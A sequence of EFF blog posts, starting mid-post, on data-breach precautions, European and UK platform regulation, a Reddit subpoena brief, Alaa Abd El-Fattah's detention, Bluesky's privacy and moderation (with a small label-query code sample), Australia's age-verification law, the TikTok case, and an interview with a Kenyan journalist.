There are steps you can take right now with all your online accounts to best protect yourself from the next data breach (and the next, and the next):

Use unique passwords on all your online accounts. This is made much easier by using a password manager, which can generate and store those passwords for you. When you have a unique password for every website, a data breach of one site won't cascade to others.

Use two-factor authentication when a service offers it. Two-factor authentication makes your online accounts more secure by requiring additional proof ("factors") alongside your password when you log in. While two-factor authentication adds another step to the login process, it's a great way to help keep out anyone not authorized, even if your password is breached.

Freeze your credit. Many experts recommend freezing your credit with the major credit bureaus as a way to protect against the sort of identity theft that's made possible by some data breaches. Freezing your credit prevents someone from opening a new line of credit in your name without additional information, like a PIN or password, to "unfreeze" the account. If you have kids, you can freeze their credit too; it might sound absurd given that they can't even open bank accounts, but it protects them as well.

Keep a close eye out for strange medical bills. With the number of health companies breached this year, it's also a good idea to watch for healthcare fraud. The Federal Trade Commission recommends watching for strange bills, letters from your health insurance company for services you didn't receive, and letters from debt collectors claiming you owe money.

(Dis)Honorable Mentions

By one report, 2023 saw over 3,000 data breaches. The figure so far this year is looking slightly smaller, with around 2,200 reported through the end of the third quarter. But 2,200 and counting is little comfort.

We did not investigate every one of these 2,000-plus data breaches, but we looked at a lot of them, including the news coverage and the data breach notification letters that many state attorney general offices host on their websites. We can't award the coveted Breachie Award to every company that was breached this year. Still, here are some (dis)honorable mentions:

ADT, Advance Auto Parts, AT&T, AT&T (again), Avis, Casio, Cencora, Comcast, Dell, El Salvador, Fidelity, FilterBaby, Fortinet, Framework, Golden Corral, Greylock, Halliburton, HealthEquity, Heritage Foundation, HMG Healthcare, Internet Archive, LA County Department of Mental Health, MediSecure, Mobile Guardian, MoneyGram, muah.ai, Ohio Lottery, Omni Hotels, Oregon Zoo, Orrick, Herrington & Sutcliffe, Panda Restaurants, Panera, Patelco Credit Union, Patriot Mobile, pcTattletale, Perry Johnson & Associates, Roll20, Santander, Spytech, Synnovis, TEG, Ticketmaster, Twilio, USPS, Verizon, VF Corp, WebTPA.

What now? Companies need to do a better job of collecting only the information they need to operate, and of properly securing what they store. Also, the U.S. needs to pass comprehensive privacy protections. At the very least, we need to be able to sue companies when these sorts of breaches happen (and while we're at it, it'd be nice if we got more than $5.21 checks in the mail).
EFF has long advocated for a strong federal privacy law that includes a private right of action.

This post is part two in a series of posts about EFF's work in Europe. Read about how and why we work in Europe here.

EFF's mission is to ensure that technology supports freedom, justice, and innovation for all people of the world. While our work has taken us to far corners of the globe, in recent years we have worked to expand our efforts in Europe, building up a policy team with key expertise in the region and bringing our experience in advocacy and technology to the European fight for digital rights.

In this blog post series, we will introduce you to the various players involved in that fight, share how we work in Europe, and show how what happens in Europe can affect digital rights across the globe.

EFF's approach to free speech

The global spread of internet access and digital services promised a new era of freedom of expression, where everyone could share and access information, speak out and find an audience without relying on gatekeepers, and make, tinker with, and share creative works.

Everyone should have the right to express themselves and share ideas freely. Various European countries have experienced totalitarian regimes and extensive censorship in the past century, and as a result, many Europeans still place special emphasis on privacy and freedom of expression. These values are enshrined in the European Convention on Human Rights and the Charter of Fundamental Rights of the European Union – essential legal frameworks for the protection of fundamental rights.

Today, as so much of our speech is facilitated by online platforms, there is an expectation that they, too, respect fundamental rights. Through their terms of service, community guidelines, or house rules, platforms get to unilaterally define what speech is permissible on their services. The enforcement of these rules can be arbitrary, opaque, and selective, resulting in the suppression of contentious ideas and minority voices.

That's why EFF has been fighting against government threats to free expression and working to hold tech companies accountable for grounding their content moderation practices in robust human rights frameworks. That entails setting out clear rules and standards for internal processes such as notifications and explanations to users when terms of service are enforced or changed. In the European Union, we have worked for decades to ensure that laws governing online platforms respect fundamental rights, advocated against censorship, and spoken up on behalf of human rights defenders.

What's the Digital Services Act and why do we keep talking about it?

For the past years, we have been especially busy addressing human rights concerns in the drafting and implementation of the Digital Services Act (DSA), the new law setting out the rules for online services in the European Union. The DSA covers most online services, ranging from online marketplaces like Amazon and search engines like Google to social networks like Meta and app stores. However, not all of its rules apply to all services – instead, the DSA follows a risk-based approach that puts the most obligations on the largest services that have the highest impact on users.
All service providers must ensure that their terms of service respect fundamental rights, that users can get in touch with them easily, and that they report on their content moderation activities. Additional rules apply to online platforms: they must give users detailed information about content moderation decisions and the right to appeal, and they face additional transparency obligations. They also have to provide some basic transparency into the functioning of their recommender systems and are not allowed to target underage users with personalized ads. The most stringent obligations apply to the largest online platforms and search engines, those with more than 45 million users in the EU. These companies, which include X, TikTok, Amazon, Google Search and Play, YouTube, and several porn platforms, must proactively assess and mitigate systemic risks related to the design, functioning, and use of their services. These include risks to the exercise of fundamental rights, elections, public safety, civic discourse, the protection of minors, and public health. This novel approach might have merit but is also cause for concern: systemic risks are barely defined and could lead to restrictions of lawful speech, and measures to address these risks, for example age verification, have negative consequences themselves, like undermining users' privacy and access to information.

The DSA is an important piece of legislation to advance users' rights and hold companies accountable, but it also comes with significant risks. We are concerned about the DSA's requirement that service providers proactively share user data with law enforcement authorities and the powers it gives government agencies to request such data. We caution against the misuse of the DSA's emergency mechanism and the expansion of the DSA's systemic-risks governance approach as a catch-all tool to crack down on undesired but lawful speech. Similarly, the appointment of trusted flaggers could lead to pressure on platforms to over-remove content, especially as the DSA does not prevent government authorities from becoming trusted flaggers.

EFF has been advocating for lawmakers to take a measured approach that doesn't undermine freedom of expression. Even though we have been successful in avoiding some of the most harmful ideas, concerns remain, especially with regard to the politicization of the DSA's enforcement and potential over-enforcement. That's why we will keep a close eye on the enforcement of the DSA, ready to use all means at our disposal to push back against over-enforcement and to defend user rights.

European laws often implicate users globally. To give non-European users a voice in Brussels, we have been facilitating the DSA Human Rights Alliance. The DSA HR Alliance is formed around the conviction that the DSA must adopt a human rights-based approach to platform governance and consider its global impact. We will continue building on and expanding the Alliance to ensure that the enforcement of the DSA doesn't lead to unintended negative consequences and respects users' rights everywhere in the world.

The UK's Platform Regulation Legislation

In parallel to the Digital Services Act, the UK has passed its own platform regulation, the Online Safety Act (OSA). Seeking to make the UK "the safest place in the world to be online," the OSA will instead lead to a more censored, locked-down internet for British users.
The Act empowers the UK government to undermine not just the privacy and security of UK residents, but of internet users worldwide.

Online platforms will be expected to remove content that the UK government views as inappropriate for children. If they don't, they'll face heavy penalties. The problem is, in the UK as in the U.S. and elsewhere, people disagree sharply about what type of content is harmful for kids. Putting that decision in the hands of government regulators will lead to politicized censorship decisions.

The OSA will also lead to harmful age-verification systems. You shouldn't have to show your ID to get online. Age-gating systems meant to keep out kids invariably lead to adults losing their rights to private speech, and to anonymous speech, which is sometimes necessary.

As Ofcom starts to release its regulations and guidelines, we're watching how the regulator plans to avoid these human rights pitfalls, and we will continue fighting any insufficient efforts to protect speech and privacy online.

Media freedom and plurality for everyone

Another issue that we have been championing is media freedom. Similar to the DSA, the EU recently overhauled its rules for media services with the European Media Freedom Act (EMFA). In this context, we pushed back against rules that would have forced online platforms like YouTube, X, or Instagram to carry any content posted by media outlets. Though intended to bolster media pluralism, forcing platforms to host content has severe consequences: millions of EU users could no longer trust that online platforms will address content violating community standards. Besides, there is no easy way to differentiate between legitimate media providers and those known for spreading disinformation, such as government-affiliated Russian sites active in the EU. Taking away platforms' ability to restrict or remove such content could undermine rather than foster public discourse.

The final version of EMFA introduced a number of important safeguards but is still a bad deal for users. We will closely follow its implementation to ensure that the new rules actually foster media freedom and plurality, inspire trust in the media, and limit the use of spyware against journalists.

Exposing censorship and defending those who defend us

Covering regulation is just a small part of what we do. Over the past years, we have again and again revealed how companies' broad-stroke content moderation practices censor users in the name of fighting terrorism and restrict the voices of LGBTQ folks, sex workers, and underrepresented groups.

Going into 2025, we will continue to shed light on these restrictions of speech, paying particular attention to the censorship of Palestinian voices, which has been rampant. We will continue collaborating with our allies in the Digital Intimacy Coalition to share how restrictive speech policies often disproportionately affect sex workers. We will also continue to closely analyze the impact of the increasing and changing use of artificial intelligence in content moderation.

Finally, a crucial part of our work in Europe has been speaking out for those who cannot: human rights defenders facing imprisonment and censorship.

Much work remains to be done. We have put forward comprehensive policy recommendations to European lawmakers, and we will continue fighting for an internet where everyone can make their voice heard.
In the next posts in this series, you will learn more about how we work in Europe to ensure that digital markets are fair, offer users choice, and respect fundamental rights.

In the early years of the internet, website administrators had to contend with a burdensome and expensive process to deploy SSL certificates. But today, hundreds of thousands of people have used EFF's free Certbot tool to spread that sweet HTTPS across the web. Now almost all internet traffic is encrypted, and everyone gets a basic level of security. Small actions mean big change when we act together. Will you support important work like this and give EFF a Year-End Challenge boost?

Give Today

Unlock Bonus Grants Before 2025

Make a donation of ANY SIZE by December 31 and you'll help us unlock bonus grants! Every supporter gets us closer to a series of seven Year-End Challenge milestones set by EFF's board of directors. These grants become larger as the number of online rights supporters grows. Everyone counts! See our progress.

🚧 Digital Rights: Under Construction 🚧

Since 1990, EFF has defended your digital privacy and free speech rights in the courts, through activism, and by making open source privacy tools. This team is committed to watching out for users no matter what direction technological innovation may take us. And that's funded entirely by donations.

Show your support for digital rights with free EFF member gear.

With help from people like you, EFF has been able to help unravel legal and ethical questions surrounding the rise of AI; push the USPTO to withdraw harmful patent proposals; fight for the public's right to access police drone footage; and show why banning TikTok and passing laws like the Kids Online Safety Act (KOSA) will not achieve internet safety.

As technology's reach continues to expand, so do everyone's concerns about harmful side effects. That's where EFF's ample experience in tech policy, the law, and human rights shines. You can help us.

Donate to defend digital rights today and you'll help us unlock bonus grants before the year ends.

Join EFF!

Proudly Member-Supported Since 1990

EFF is a member-supported U.S. 501(c)(3) organization. We're celebrating ELEVEN YEARS of top ratings from the nonprofit watchdog Charity Navigator! Your donation is tax-deductible as allowed by law.

Some people just can't take a hint. Today's perfect example is a group of independent movie distributors that have repeatedly tried, and failed, to force Reddit to give up the IP addresses of several users who posted about downloading movies.

The distributors claim they need this information to support their copyright claims against internet service provider Frontier Communications, because it might be evidence that Frontier wasn't enforcing its repeat infringer policy and therefore couldn't claim safe harbor protections under the Digital Millennium Copyright Act. Courts have repeatedly refused to enforce these subpoenas, recognizing that the distributors couldn't pass the test the First Amendment requires prior to unmasking anonymous speakers.

Here's the twist: after the magistrate judge in this case applied this standard and quashed the subpoena, the movie distributors sought review from the district court judge assigned to the case.
The second judge also denied discovery as unduly burdensome but, in a hearing on the matter, said there was no First Amendment issue because the users were talking about copyright infringement. In their subsequent appeal to the Ninth Circuit, the distributors invite the appellate court to endorse the judge's statement.

As we explain in an amicus brief supporting Reddit, the court should refuse that invitation. Discussions about illegal activity clearly are protected speech. Indeed, the Supreme Court recently affirmed that even "advocacy of illegal acts" is "within the First Amendment's core." In fact, protecting such speech is a central purpose of the First Amendment, because it ensures that people can robustly debate civil and criminal laws and advocate for change.

There is no reason to imagine that this bedrock principle doesn't apply just because the speech concerns copyright infringement – especially where the speakers aren't even defendants in the case, but independent third parties. And unmasking Does in copyright cases carries particular risks, given the long history of copyright claims being used as an excuse to take down lawful as well as infringing content online.

We're glad to see Reddit fighting back against these improper subpoenas, and proud to stand with the company as it stands up for its users.

As the UK's Prime Minister Keir Starmer and Foreign Secretary David Lammy have failed to secure the release of British-Egyptian blogger, coder, and activist Alaa Abd El-Fattah, UK politicians are calling for tougher measures to secure Alaa's immediate return to the UK.

During a debate on detained British nationals abroad in early December, chairwoman of the Commons Foreign Affairs Committee Emily Thornberry asked the House of Commons why the UK has continued to organize industry delegations to Cairo while "the Egyptian government have one of our citizens – Alaa Abd El-Fattah – wrongfully held in prison without consular access."

In the same debate, Labour MP John McDonnell urged the introduction of a "moratorium on any new trade agreements with Egypt until Alaa is free," a call supported by other politicians. Liberal Democrat MP Calum Miller also highlighted words from Alaa, who told his mother during a recent prison visit that he had "hope in David Lammy, but I just can't believe nothing is happening... Now I think either I will die in here, or if my mother dies I will hold him to account."

Alaa's mother, mathematician Laila Soueif, has been on hunger strike for 79 days while she and the rest of his family have worked to engage the British government in securing Alaa's release. On December 12, she also started protesting daily outside the Foreign Office and has since been joined by numerous MPs.

Support for Alaa has come from many directions.
On December 6, 12 Nobel laureates wrote to Keir Starmer urging him to secure Alaa’s immediate release, “Not only because Alaa is a British citizen, but to reanimate the commitment to intellectual sanctuary that made Britain a home for bold thinkers and visionaries for centuries.” The pressure on Labour’s senior politicians has continued throughout the month, with more than 100 MPs and peers writing to David Lammy on December 15 demanding Alaa be freed.
Alaa should have been released on September 29, after serving his five-year sentence for sharing a Facebook post about a death in police custody, but Egyptian authorities have continued his imprisonment in contravention of the country’s own Criminal Procedure Code. British consular officials are prevented from visiting him in prison because the Egyptian government refuses to recognise Alaa’s British citizenship.
David Lammy met with Alaa’s family in November and promised to take action. But the UK’s Prime Minister failed to raise the case at the G20 Summit in Brazil when he met with Egypt’s President El-Sisi.
If you’re based in the UK, here are some actions you can take to support the calls for Alaa’s release:

Write to your MP (external link): https://freealaa.net/message-mp
Join Laila Soueif outside the Foreign Office daily between 10-11am
Share Alaa’s plight on social media using the hashtag #freealaa

The UK Prime Minister and Foreign Secretary’s inaction is unacceptable. Every second counts, and time is running out. The government must do everything it can to ensure Alaa’s immediate and unconditional release.

Bluesky promises to rethink social media by focusing on openness and user control. But what does this actually mean for the millions of people joining the site?
November was a good month for alternatives to X. Many users hit their breaking point after two years of controversial changes turned Twitter into X, a restrictive hub filled with misinformation and hate speech. Musk’s involvement in the U.S. presidential election was the last straw for many who are now looking for greener pastures.
Threads, the largest alternative, grew about 15% with 35 million new users. The most explosive growth, however, came from Bluesky, which grew over 500% to a total user base of more than 25 million at the time of writing.
We’ve dug into the nerdy details of how Mastodon, Threads, and Bluesky compare, but given this recent momentum it’s important to clear up some questions for new Bluesky users about what this new approach to the social web really means for how you connect with people online.
Note that Bluesky is still in an early stage, and many big changes are anticipated from the project. Answers here are accurate as of the time of writing, and will indicate the company’s future plans where possible.
Is Bluesky Just Another Twitter?
At face value the Bluesky app has a lot of similarities to Twitter prior to becoming X. That’s by design: the Bluesky team has prioritized making a drop-in replacement for 2022-era Twitter, so everything from the layout to the posting options to the color scheme will feel familiar to anyone who used that site.
While discussed in the context of decentralization, this experience is still very centralized like traditional social media, with a single platform controlled by one company, Bluesky PBLLC.
However, a few aspirations from this company make it stand out:

Prioritizing interoperability and community development: Other platforms frequently get this wrong, so this dedication to user empowerment and open source tooling is commendable.
“Credible exit” decentralization: Bluesky the company wants Bluesky, the network, to be able to function even if the company is eliminated or “enshittified.”

The first difference is evident already from the wide variety of tools and apps on the network. From blocking certain content to highlighting communities you’re a part of, there are a lot of settings to make your feed yours, some of which we walked through here. You can also abandon Bluesky’s Twitter-style interface for an app like Firesky, which presents a stream of all Bluesky content. Other apps on the network can even be geared towards sharing audio, events, or working as a web forum, all using the same underlying AT Protocol. This interoperable and experimental ecosystem parallels another based on the ActivityPub protocol, called “the fediverse,” which connects Threads to Mastodon as well as many other decentralized apps that experiment with the functions of traditional social media sites.
That “credible exit” priority is less immediately visible, but it explains some of the ways Bluesky looks different. The most visible difference is that usernames are domain names, with the default for new users being a subdomain of bsky.social. EFF set it up so that our account name is our website, @eff.org, which will be the case across the Bluesky network, even if viewed with different apps. Comparable to how Mastodon handles verification, no central authority or government documents are needed; verification is just proof of control over a site or record.
As Bluesky decentralizes, it is likely to diverge more from the Twitter experience as the tricky problems of decentralization creep in.
How Is Bluesky for Privacy?
While Bluesky is not engaged in surveillance-based advertising like many incumbent social media platforms, users should be aware that shared information is more public and accessible than they might expect.
Bluesky, the app, offers some sensible data-minimizing defaults like requiring user consent for third-party embedded media, which can include tracking. The real assurance to users, however, is that even if the flagship apps were to become less privacy protective, the open tools let others make full-featured alternative apps on the same network.
However, by design, Bluesky content is fully public on the network. Users can change privacy settings to ask that apps on the network require login to view their account, but honoring that request is optional. Every post, every like, and every share is visible to the world. Even blocking data is plainly visible. By design, all of this information is also accessible in one place, as Bluesky aims to be the megaphone for a global audience that Twitter once was.
This transparency extends to how Bluesky handles moderation, where users and content are labeled by a combination of Bluesky moderators, community moderators, and automated labeling.
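These labels are themselves public data: a labeler service publishes them over the AT Protocol’s XRPC interface, and any client can query them. Here is a minimal sketch of what that looks like, assuming the com.atproto.label.queryLabels endpoint from the published AT Protocol lexicon; the labeler host and the example DID below are placeholders, so check a labeler’s current documentation before relying on either:

```python
# Minimal sketch: query the labels a moderation service has applied to an
# account or record, via the AT Protocol's public XRPC interface.
# Assumptions: the com.atproto.label.queryLabels endpoint as published in
# the AT Protocol lexicon; LABELER_HOST and the example DID are placeholders.
import json
import urllib.parse
import urllib.request

LABELER_HOST = "https://mod.bsky.app"  # assumed host of Bluesky's labeler


def query_labels(uri_pattern: str, limit: int = 50) -> list:
    """Return label records whose subject matches uri_pattern."""
    params = urllib.parse.urlencode({"uriPatterns": uri_pattern, "limit": limit})
    url = f"{LABELER_HOST}/xrpc/com.atproto.label.queryLabels?{params}"
    with urllib.request.urlopen(url) as resp:
        return json.load(resp).get("labels", [])


# Labels attach to accounts (by DID) or to individual records (by AT-URI).
for label in query_labels("did:plc:example"):  # hypothetical DID
    # Each label names its source (src), its subject (uri), and a value (val).
    print(label.get("src"), label.get("uri"), label.get("val"))
```

Because labels are data rather than decisions baked into one company’s app, each client can choose which labelers to trust and what to do with each label value.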
The result is that information about you will, over time, be held by these moderators to either promote or hide your content.
Users leaving X out of frustration with the platform feeding public content into AI training may also find that this approach of funneling all content into one stream is very friendly to scraping for AI training by third parties. Bluesky’s CEO has been clear that the company will not engage in AI licensing deals, but this exposure is inherent to any network prioritizing openness. The freedom to use public data for creative expression, innovation, and research extends to those who use it to train AI.
Users you have blocked may also be able to use this public stream to view your posts without interacting with you. If your threat model includes trolls and other bad actors who might reshare your posts in other contexts, this is important to consider.
Direct messages are not included in this heap of public information. However, they are not end-to-end encrypted, and they are hosted only on Bluesky’s servers. As was the case for X, that means any DM is visible to Bluesky PBLLC. DMs may be accessed for moderation or for valid police warrants, and may even one day become public through a data breach. Encrypted DMs are planned, but until then we advise moving sensitive conversations to dedicated, fully encrypted messaging apps.
How Do I Find People to Follow?
Tools like Skybridge are being built to make it easier for people to import their Twitter contacts into Bluesky. Similar to advice we gave for joining Mastodon, keep in mind these tools may need extensive account access, and may need to be re-run as more people switch networks.
Bluesky has also implemented “starter packs,” which are curated lists of users that anyone can create and share with new users. EFF recently put together a few for you to check out:

Electronic Frontier Foundation Staff
Electronic Frontier Alliance members
Digital Rights, News & Advocacy

Is Bluesky In the Fediverse?
“Fediverse” refers to a wide variety of sites and services generally communicating with each other over the ActivityPub protocol, including Threads, Mastodon, and a number of other projects. Bluesky uses the AT Protocol, which is not currently compatible with ActivityPub, so it is not part of the fediverse.
However, Bluesky is already being integrated into the vision of an interoperable and decentralized social web. You can follow Bluesky accounts from the fediverse over RSS. A number of mobile apps will also seamlessly merge Bluesky and fediverse feeds and let you post to both accounts. Even with just one Bluesky or fediverse account, users can also share posts and DMs to both networks using a project called Bridgy Fed.
In recent weeks this bridging also opened up to the hundreds of millions of Threads users. It just requires the additional step of enabling fediverse sharing before connecting to the Bridgy Fed fediverse account. We’re optimistic that all of these projects will continue to improve their integrations in the future.
Is the Bluesky Network Decentralized?
The current Bluesky network is not decentralized.
It is nearly all made and hosted by one company, Bluesky PBLLC, which is working on creating the “credible exit” from its control as a platform host.
If Bluesky the company and the infrastructure it operates disappeared tonight, however, the entire Bluesky network would effectively vanish along with it.
Of the 25 million users, only about 10,000 are hosted by non-Bluesky services, most of them through fediverse connections. Changing to another host is also currently a one-way exit. All DMs rely on Bluesky-owned servers, as does the current system for managing user identities, as well as the resource-intensive “Relay” server aggregating content from across the network. The same company also handles the bulk of moderation and develops the main apps used by most users. Compared to networks like the fediverse or even email, hosting your own Bluesky node currently requires a considerable investment.
Even once that changes, a “credible exit” is not quite the same as “decentralized.” An escape hatch for particularly dire circumstances is good, but it falls short of the distributed power and decision-making of decentralized networks. This distinction will become more pressing as the reliance on Bluesky PBLLC is tested, and as the company opens up each component of the network to more third parties.
How Does Bluesky Make Money?
The past few decades have shown the same “enshittification” cycle too many times. A new startup promises something exciting, users join, and then the platform turns on users to maximize profits, often through surveillance and restricting user autonomy.
Will Bluesky be any different? From the team’s outlined plan we can glean that Bluesky promises not to use surveillance-based advertising, nor to lock in users. Bluesky CEO Jay Graber also promised not to sell user content for AI training licenses, and intends to always keep the service free to join. Paid services like custom domain hosting or paid subscriptions seem likely.
So far, though, the company relies on investment funding. It was initially incubated by Twitter co-founder Jack Dorsey, who has since distanced himself from the project, and more recently received $8 million and $15 million rounds of funding.
That later investment round raised concerns among the existing userbase that Bluesky would pivot to some form of cryptocurrency service, as it was led by Blockchain Capital, a cryptocurrency-focused venture capital company which also had a partner join the Bluesky board. Jay Graber committed to “not hyperfinancialize the social experience” with blockchain projects, and emphasized that Bluesky does not use blockchain.
As noted above, Bluesky has prioritized maintaining a “credible exit” for users, a commitment to interoperability that should keep the company accountable to the community and hopefully prevent the kind of “enshittification” that drove people away from X. Holding the company to all of these promises will be key to seeing the Bluesky network and the AT Protocol reach that point of maturity.
How Does Moderation Work?
Our comparison of Mastodon, Threads, and Bluesky gets into more detail, but as it stands Bluesky’s moderation is similar to Twitter’s before Musk. The Bluesky corporation uses the open moderation tools to label posts and users, and will remove users from its hosted services for breaking its terms of service. This tooling keeps the Bluesky company’s moderation tied to its “credible exit” goals, giving it the same leverage any other future operator might have.
It also means that Bluesky’s centralized moderation can’t scale, and even with a good-faith effort it will run into issues.
Bluesky accounts for this by opening its moderation tools to the community. Advanced options are available under settings in the web app, and anyone can label content and users on the site. These labels let users filter, prioritize, or block content. However, only Bluesky has the power to “deplatform” poorly behaved users by removing them, either by no longer hosting their account, no longer relaying their content to other users, or both.
Bluesky aspires to censorship resistance, and part of creating a “credible exit” means reducing the company’s ability to remove users entirely. In a future with a variety of hosts and relays on the Bluesky network, removing a user looks more like removing a website from the internet: not impossible, but very difficult. Instead, users will need to settle for filtering out or blocking speech they object to, and take some comfort that voices they align with will not be removed from the network.
The permeability of Bluesky also means community tooling will need to address network abuses, like last May when a pro-Trump botnet on Nostr bridged to Bluesky via Mastodon to flood timelines. It’s possible that, as in the fediverse, Bluesky may eventually form a network of trusted account hosts and relays to mitigate these concerns.
Bluesky is still a work in progress, but its focus on decentralization, user control, and interoperability makes it an exciting space to watch. Whether you’re testing the waters or planning a full migration, these insights should help you navigate the platform.

Age verification systems are surveillance systems that threaten everyone’s privacy and anonymity. But Australia’s government recently decided to ignore these dangers, passing a vague, sweeping piece of age verification legislation after giving only a day for comments. The Online Safety Amendment (Social Media Minimum Age) Act 2024, which bans children under the age of 16 from using social media, will force platforms to take undefined “reasonable steps” to verify users’ ages and prevent young people from using them, or face over $30 million in fines.
The country’s Prime Minister, Anthony Albanese, claims that the legislation is needed to protect young people in the country from the supposed harmful effects of social media, despite no study showing such an impact. This legislation will be a net loss for both young people and adults who rely on the internet to find community and themselves.
The law does not specify which social media platforms will be banned. Instead, this decision is left to Australia’s communications minister, who will work alongside the country’s internet regulator, the eSafety Commissioner, to enforce the rules. This gives government officials dangerous power to target services they do not like, all at a cost to both minor and adult internet users.
The legislation also does not specify what type of age verification technology will be necessary to implement the restrictions, but it prohibits using only government IDs for this purpose. This is a flawed attempt to protect privacy.
Since platforms will have to offer ways to verify users’ ages other than government ID, they will likely rely on unreliable tools like biometric scanners.
The Australian government awarded the contract for testing age verification technology to a UK-based company, Age Check Certification Scheme (ACCS), which, according to the company’s website, “can test all kinds of age verification systems,” including “biometrics, database lookups, and artificial intelligence-based solutions.”
The ban will not take effect for at least another 12 months while these points are decided upon, but we are already concerned that the systems required to comply with this law will burden all Australians’ privacy, anonymity, and data security.
Banning social media and introducing mandatory age verification checks is the wrong approach to protecting young people online, and this bill was hastily pushed through the Parliament of Australia with little oversight or scrutiny. We urge politicians in other countries, like the U.S. and France, to explore less invasive approaches to protecting all people from online harms, and to focus on comprehensive privacy protections rather than mandatory age verification.

The TikTok ban itself, and the DC Circuit’s approval of it, should be of great concern even to those who find TikTok undesirable or scary. Shutting down communications platforms or forcing their reorganization based on concerns of foreign propaganda and anti-national manipulation is an eminently anti-democratic tactic, one that the U.S. has previously condemned globally.
The U.S. government should not be able to restrict speech, in this case by cutting off a tool used by 170 million Americans to receive information and communicate with the world, without proving with evidence that the tool is presently, seriously harmful. But in this case, Congress has required, and the DC Circuit approved, TikTok’s forced divestiture based only upon fears of future potential harm. This greatly lowers well-established standards for restricting freedom of speech in the U.S.
So we are pleased that the Supreme Court will take the case, and we will urge the justices to apply the appropriately demanding First Amendment scrutiny.

Winnie Kabintie is a journalist and Communications Specialist based in Nairobi, Kenya. As an award-winning youth media advocate, she is passionate about empowering young people with Media and Information Literacy skills, enabling them to critically engage with and shape the evolving digital media landscape in meaningful ways.
Greene: To get us started, can you tell us what the term free expression means to you?
I think it’s the opportunity to speak in a language that you understand and speak about subjects of concern to you and to anybody who is affected or influenced by the subject of conversation. To me, it is the ability to communicate openly and share ideas or information without interference, control, or restrictions.
As a journalist, it means having the freedom to report on matters affecting society and my work without censorship or limitations on where that information can be shared. Beyond individual expression, it is also about empowering communities to voice their concerns and highlight issues that impact their lives. Additionally, access to information is a vital component of freedom of expression, as it ensures people can make informed decisions and engage meaningfully in societal discourse, because knowledge is power.
Greene: You mention the freedom to speak and to receive information in your language. How do you see that currently?
Are language differences a big obstacle that you see currently?
If I just look at my society, and I like to contextualize things, we have Swahili, which is a national language, and we have English as the secondary official language. But when it comes to policies and public engagement, we only see this happening in documents written in English. This means that at the public barazas (community gatherings), interpretation is led by a few individuals, which creates room for disinformation and misinformation. I believe the language barrier is an obstacle to freedom of speech. We’ve also seen it in civil society dynamics: when you’re going to engage a community but you don’t speak the same language as them, it becomes very difficult for you to engage them on the subject at hand. And if you have to use a translator, sometimes the only advantage they bring to the table is the fact that they understand the different languages; they’re not experts in the topic that you’re discussing.
Greene: Why do you think the government only produces materials in English? Do you think part of that is because they want to limit who is able to understand them? Or is it just, are they lazy or they just disregard the other languages?
In all fairness, I think it comes from the systematic approach to how things run. This has been the way of doing things, and it’s easier to do it because translating some words from, for example, English to Swahili is very hard. And you see, as much as we speak Swahili in Kenya, and it’s our national language, the kind of Swahili we speak is also very diluted or corrupted with English and Sheng, which I like to call “ki-shenglish.” I know there were attempts to translate the new Kenyan Constitution, and they did translate some bits of the summarized copy, but even then it wasn’t the full Constitution. We don’t even know how to say certain English words in Swahili, which makes it difficult to translate many things. So I think it’s just an innocent omission.
Greene: What makes you passionate about freedom of expression?
As a journalist and youth media advocate, my passion for freedom of expression stems from its fundamental role in empowering individuals and communities to share their stories, voice their concerns, and drive meaningful change. Freedom of expression is not just about the right to speak; it’s about the ability to question, to challenge injustices, and to contribute to shaping a better society.
For me, freedom of expression is deeply personal: I like to question and interrogate, and I am not just content with the status quo. As a journalist, I rely on this freedom to shed light on critical issues affecting society, to amplify marginalized voices, and to hold power to account. As a youth advocate, I’ve witnessed how freedom of expression enables young people to challenge stereotypes, demand accountability, and actively participate in shaping their future. We saw this during the recent Gen Z revolution in Kenya, when youth took to the streets to reject the proposed Finance Bill.
Freedom of speech is also about access. It matters to me that people not only have the ability to speak freely, but also have the platforms to articulate their issues. You can have all the voice you need, but if you do not have the platforms, then it becomes nothing.
So it’s also recognizing that we need to create the right platforms to advance freedom of speech. These, in our case, include platforms like radio and social media.
So we need to ensure that we have connectivity to these platforms. For example, in the rural areas of our countries, there are some areas that are not even connected to the internet. They don’t have the infrastructure, including electricity. It then becomes difficult for those people to engage on the digital media platforms where everybody is now engaging. I remember recently, during the Reject Finance Bill process in Kenya, the political elite realized that they could leverage social media to meet with and engage the youth. I remember the President was summoned to an X Space, and he showed up, and there was dialogue with hundreds of young people. But what this meant was that the youth in rural Kenya who didn’t have access to the internet or X were left out of that national, historic conversation. That’s why I say it’s not as simple as saying you are guaranteed freedom of expression by the Constitution. It’s also about how governments are ensuring that we have the channels to advance this right.
Greene: Have you had a personal experience or any personal experiences that shaped how you feel about freedom of expression? Maybe a situation where you felt like it was being denied to you or someone close to you was in that situation?
At a personal level I believe that I am a product of speaking out, and I try to use my voice to make an impact! There is also this one particular incident that stands out from my early career as a journalist. In 2014 I amplified a story from a video shared on Facebook by writing a news article that was published on The Kenya Forum, which at the time was one of only two fully digital publications in the country covering news and feature articles.
The story, a case of gender-based assault, gained traction, drawing attention to the unfortunate incident that had seen a woman stripped naked allegedly for being “dressed indecently.” The public uproar sparked the famous #MyDressMyChoice protest in Kenya, where women took to the streets countrywide to protest against sexual violence.
Greene: Wow. Do you have any other specific stories that you can tell about the time when you spoke up and you felt that it made a difference? Or maybe you spoke up, and there was some resistance to you speaking up?
I’ve had many moments where I’ve spoken up and it’s made a difference, including the incident I shared in the previous question. But, on the other hand, I also had a moment where I did not speak out, years ago, when a classmate in primary school was accused of theft.
There was this girl once in class who was caught with books that didn’t belong to her, and she was accused of stealing them. One of the books she had was my deskmate’s, and I was there when she had borrowed it. So she was defending herself and told the teacher, “Winnie was there when I borrowed the book.” When the teacher asked me if this was true I just said, “I don’t know.” That answer was her last line of defense, and the girl got expelled from school. So I’ve always wondered, if I’d said yes, would the teacher have been more lenient and realized that she had probably just borrowed the rest of the books as well?
I was only eight years old at the time, but because of that, and how bad the outcome made me feel, I vowed to myself to always stand for the truth even when it’s unpopular with everyone else in the room. I would never look the other way in the face of an injustice or in the face of an issue that I can help resolve. I will never walk away in silence.
Greene: Have you kept to that since then?
Absolutely.
Greene: Okay, I want to switch tracks a little bit. Do you feel there are situations where it’s appropriate for government to limit someone’s speech?
Yes, absolutely. In today’s era of disinformation and hate speech, it’s crucial to have legal frameworks that safeguard society. We live in a society where people, especially politicians, often make inflammatory statements to gain political mileage, and such remarks can lead to serious consequences, including civil unrest.
Kenya’s experience during the 2007-2008 elections is a powerful reminder of how harmful speech can escalate tensions and pit communities against each other. That period taught us the importance of being mindful of what leaders say, as their words have the power to unite or divide.
